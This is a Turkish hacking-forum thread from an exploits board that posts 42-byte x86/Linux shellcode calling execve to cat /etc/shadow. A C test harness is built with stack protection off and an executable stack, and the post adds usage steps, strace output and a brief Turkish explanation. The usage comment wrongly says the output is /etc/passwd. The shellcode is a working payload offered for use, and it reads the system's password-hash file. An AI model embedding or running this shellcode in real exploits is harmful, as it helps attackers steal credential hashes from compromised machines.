Turkhackteam.net/org - Turkish Hacking & Security Platform...  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform... >
Turkhackteam Under Ground
> Exploitler > Bug Researchers

Bug Researchers Yeni bulunan açıklar.


x86/Linux execve("/bin/cat", ["/bin/cat", "//etc/shadow"], NULL) Shellcode

Bug Researchers

Yeni Konu aç Cevapla
 
Seçenekler
Alt 15-08-2016   #1
  • Offline
  • Forumdan Uzaklaştırıldı
  • Genel Bilgiler
Üyelik tarihi
Jul 2016
Nereden
Assembly
Mesajlar
Konular


  
x86/Linux execve("/bin/cat", ["/bin/cat", "//etc/shadow"], NULL) Shellcode


#Gecmise Donus \w xd3.
(Son: 2)



Kod:
/*
 *             ::execve("/bin/cat", ["/bin/cat", "//etc/shadow"], NULL) Shellcode
 *   __author__: xd3
 *     __date__: 15/9/22
 *   __format__: ELF 32 Bit
 * __platform__: x86/Linux
 *     __size__: 42 Bytes
 *    
 */
 
 /* Usage:
  * 
  * # gcc -fno-stack-protector -z execstack xd3.c -o xd3
  * # ./xd3
  * [~] Byte-Code Len: 42
  * .. $(cat /etc/passwd) output
  * #
  */

#include <stdio.h>
#include <string.h>

const unsigned char xd3[] = \
"\x6a\x0b\x58\x99\x52\x68"
"\x61\x64\x6f\x77\x68\x63"
"\x2f\x73\x68\x68\x2f\x2f"
"\x65\x74\x89\xe1\x52\x68"
"\x2f\x63\x61\x74\x68\x2f"
"\x62\x69\x6e\x89\xe3\x52"
"\x51\x53\x89\xe1\xcd\x80";


int main(){ 
    printf("[~] Byte-Code Len: %d\n", strlen(xd3));
    int (*sh3llc0de)();
    sh3llc0de = (int (*)()) xd3;
    (int)(*sh3llc0de)();
}


Soru & Cevap
Alıntı:
DarkmeteR´isimli üyeden Alıntı Mesajı göster
Bu nedir öğretirseniz sevinirim :0.
Bu tam olarak, Linux cekirdegi tabanli dagitimlarda yer alan, kullaniciya ozel bilgileri iceren (K. Adi, bitis tarihi, sifre..) "/etc/shadow" dosyasini okuyan bir bayt kodudur. Yapi olarak 11 numarali sistem cagrisini kullanarak (execve) argumanlari calistirir (/bin/cat, [/bin/cat, /etc//shadow], NULL). En genel tanimi ile bayt kodu, mimarisi onceden belirli makine talimatlaridir. Bayt anlaminda kucuk olmasi bunu ozel yapar. Sorun su ki, disassembly yapilmadigi surece pek okunabilir degildir, ayrica sifrelenmis olabilir. Bu sebeple kotu amacli birisi bayt kodu ayagina sizi kendi cikarlarinca kullanabilir. Her kaynaktaki bayt kodlarini dikkate almayiniz.

$ strace ./xd3
..
execve("/bin/cat", ["/bin/cat", "//etc/shadow"], NULL) = 0
..


    

Konu 22a02 tarafından (15-08-2016 Saat 10:39 ) değiştirilmiştir..
Offline
 
Alıntı ile Cevapla
Alt 15-08-2016   #2
  • Offline
  • Üsteğmen
  • Genel Bilgiler
Üyelik tarihi
Jan 2015
Nereden
Eskişehir
Yaş
16
Mesajlar
Konular


  

Tamam bıraz arastırmayla buldum :0 "shellcode" elınıze saglık.
    


__________________

/ ____\_____ ____________ __| _/_____ ___.__.
\ __\ \__ \ \ / __ | \__ \ < | |
| | / \_| \// __ \_/ /_// __ __ |
|__ (____ /|__| (____ /\____ | (____ // ____|
/


Konu DarkmeteR tarafından (15-08-2016 Saat 10:33 ) değiştirilmiştir..
Offline
 
Alıntı ile Cevapla
Alt 15-08-2016   #3
  • Offline
  • Ar-Ge Tim Asistanı
  • Genel Bilgiler
Üyelik tarihi
Oct 2015
Nereden
rm -rf/
Mesajlar
Konular


  

Ellerine sağlık
    


__________________

I surrender my soul
Odin hear my call

hacknology@hacknologyroot:~/
Offline
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından açılmaktadır.
Bu konular yönetimimiz tarafından takip edilsede gözden kaçabilen telif hakkı olan veya mahkeme kararı çıkmış konular sitemizde bulunabilir. Bu tür konuları bize turkhackteamiletisim [at] gmail.com adresine mail atarak bildirdiğiniz takdirde en kısa sürede konular hakkında gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com


Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz, bu sitelerin güvenlik açıklarını site sahibine bildirmek için çaba sarfeder.
Turkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Turkhackteam sorumlu değildir. Sitelerinize Turkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.




Powered by vBulletin® Copyright ©2000 - 2017

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı



Google Links

Referandum 2017



Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.